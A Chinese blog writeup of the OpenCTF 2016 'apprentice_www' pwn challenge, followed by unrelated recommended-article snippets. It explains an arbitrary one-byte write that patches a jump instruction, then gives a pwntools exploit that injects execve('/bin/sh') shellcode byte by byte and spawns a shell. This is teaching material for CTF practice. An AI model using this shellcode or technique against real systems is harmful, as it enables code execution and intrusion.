【Writeup】i春秋 Linux Pwn 入门教程_Openctf 2016-apprentice_www

最新推荐文章于 2022-03-01 23:49:19 发布
最新推荐文章于 2022-03-01 23:49:19 发布
阅读量376 收藏
点赞数 1
分类专栏: i春秋_Linux pwn入门教程系列 - Writeups 文章标签: Writeup Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38100569/article/details/100108868
版权

0x01 解题思路

  • 查看文件基本信息
    在这里插入图片描述

  • IDA查看

    main
    在这里插入图片描述

    setup
    在这里插入图片描述
    调用mprotect函数给.bss、.text、.data等段增加了可读可写可执行权限

    butterflySwag
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
      接收两次用户输入,第一次输入v1为一个地址,第二次输入v2为一个整数。之后会把v2的最低一个字节写入到v1指向的内存单元。这样就可以把shellcode写入到任意的可读可执行页。但是由于一次只能写入一个字节,需要跳转到第一个scanf执行之前循环接受输入。那么就可以把080485D9处的jnz短跳转指令的操作数修改一下,使其跳转至0804859D处循环执行写入shellcode。注意操作数的计算方式:跳转点地址-跳转指令的后一条指令的地址(单字节)。另外,输入的shellcode地址和shellcode单个字节都必须转成字符串。

0x02 EXP

#!/usr/bin/python
#coding:utf-8

from pwn import *

io = process('./apprentice_www')

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
jnz_param_addr = 0x080485DA
shellcode_addr = 0x080485DB

io.sendline(str(jnz_param_addr))
io.sendline(str(0xc2))

for i in range(len(shellcode)):
	io.sendline(str(shellcode_addr + i))
	io.sendline(str(ord(shellcode[i])))

io.sendline(str(jnz_param_addr))
io.sendline(str(0x00))

io.interactive()
BAKUMANSEC
关注
专栏目录
Openctf-2016-pwn-apprentice_www 题解
lifanxin的博客
02-07 237
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016Openctf的一道pwn题–apprentice_www 检查文件信息:   32位小端程序,只开启NX保护 漏洞定位 程序main函数如上图所示,setup函数使用了mprotect开辟了一个可写、可读以及可执行的内存区域,其截图如下;加上checksec信息的NX保护,其实这里已经暗示了将shellcode存储在此然后执行的漏洞利用方法。 接下来我们看一下butterflySwag函数,如下图所示,其第一个sc
XCTF OpenCTF 2017 部分WP(8道)
qq_42192672的博客
10-10 1715
最近想去看看XCTF实训平台,算是给自己的一个督促吧,选的第一个目标是OpenCTF 2017 1. OpenReverse 拖进IDA分析main函数,截图如下 其实就是比较v30与v4地址处的字符串是否相等,v30是我们的输入,那么关键就是看v4了 v4的初始值我们都知道,接下来观察函数40100对v4有什么改变 发现有对v4开始的26个字符全部进行了一个异或操作 当然拉我们动...
Writeup】i春秋 Linux Pwn 入门教程_CSAW Quals CTF 2017-pilot
BAKUMANSEC - Just Do It
08-21 694
Linux pwn入门教程(2)——shellcode的使用,原理与变形 0x01 解题思路 查看文件信息并试运行 没有开保护,显示有RWX段。shellcode必须在具有R和X属性的内存空间上才能执行; 执行时输出了一个地址0x7ffd426b9ca0; 有用户输入点。 拖入IDA 64bits,F5查看 main 如图所示,红框处分别为输出地址和读取用户输...
Writeup】i春秋 Linux Pwn 入门教程_EasyCTF 2017-doubly_dangerous
BAKUMANSEC - Just Do It
08-20 807
Linux pwn入门教程(1)——栈溢出基础 0x01 解题思路 查看文件信息并试运行 ​ 开启了NX,栈上无法执行代码。 拖入IDA 32bits,F5查看 ​ main 显然存在栈溢出漏洞,目前存在两种思路: 覆盖RIP为give_flag地址,执行give_flag函数 覆盖v5的值为11.28125,使其通过判断执行give_flag函数 通过尝试发现,按...
i春秋linux-pwn入门教程
Sakura给爷pwn全场
12-03 357
https://www.cnblogs.com/ichunqiu/p/11583552.html
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
Buu CTF PWN pwn1_sctf_2016 WriteUp
m0sway的博客
03-01 329
Buu CTF PWNpwn1_sctf_2016WriteUp
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目,您的目标是使用来自6位参与者的...
python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 875
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程的技...
OBS-Studio-30.2.3-Windows.zip
最新发布
09-23
OBS-Studio-30.2.3-Windows.zip
ChanjeeDlnaTool-v1.0 推送电脑上的文件到安卓电视大屏,实现音视频播放和apk安装
09-23
详情参考:https://blog.csdn.net/title71/article/details/142462255?spm=1001.2014.3001.5501 文件里面含有视频使用教程 一.windows+Android大屏 使用投送教程: 准备 0.电视机和电脑要在同一网络下面 1.使用u盘安装chanjeeDlnaTool.apk到电视机 2.将Windows软件拷贝到合适目录,将.mp4 /.flac /.jpg ...文件拷贝到软件目录的www/files文件夹下面 投送 1.打开Android电视机大屏的刚安装的软件,找到左上角显示的电视机的ip地址 2.双击打开Windows软件的ChanjeeDlnaTool.exe文件,有弹窗提示防火墙网络,请点击允许 3.在Windows软件的ip地址栏输入Android电视机大屏上面的ip地址,并在Windows软件点击认证 4.认证完成后Windows软件下方蓝字会提示Binging successful 就说明绑定成功,此时就可以在Windows软件选择本地文件向Android大屏投送文件了
CODESYS是PLC软件编程工具.docx
09-23
CODESYS是一款功能强大的PLC(可编程逻辑控制器)软件编程工具,广泛应用于工业自动化领域。以下是对CODESYS的详细介绍: 一、基本概述 定义:CODESYS是Controlled Development System的缩写,是可编程逻辑控制PLC的完整开发环境。 开发商:CODESYS软件商是德国Smart software solution GmbH,该公司位于德国巴伐利亚州肯普腾市。 最新版本:CODESYS V3(国内PLC用户使用的版本多为CODESYS V2.3)。V3版本在软件架构上有了很大的改善,朝安全软件的方向发展,正在申请TUV关于EN 61508的SIL认证。 二、主要特点 开放性:CODESYS是一个开放的软件平台,允许第三方开发者在其上开发定制化的解决方案,适应不同厂商的PLC设备,具有很高的灵活性和扩展性。 跨平台:CODESYS可以运行在多种不同的操作系统上,包括Windows、Linux和嵌入式系统(RTOS),提高了开发效率和可移植性。 多语言支持:支持IEC61131-3标准下的IL、ST、FBD、LD、CFC、SFC六种PLC编程语言,用
广西医药大学在湖南2021-2024各专业最低录取分数及位次表.pdf
09-23
全国各大学在湖南2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
全球法务会计解决方案行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
09-23
全球法务会计解决方案行业总体规模、主要企业国内外市场占有率及排名(2024版).docx
电子科技大学在湖南2021-2024各专业最低录取分数及位次表.pdf
09-23
全国各大学在湖南2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值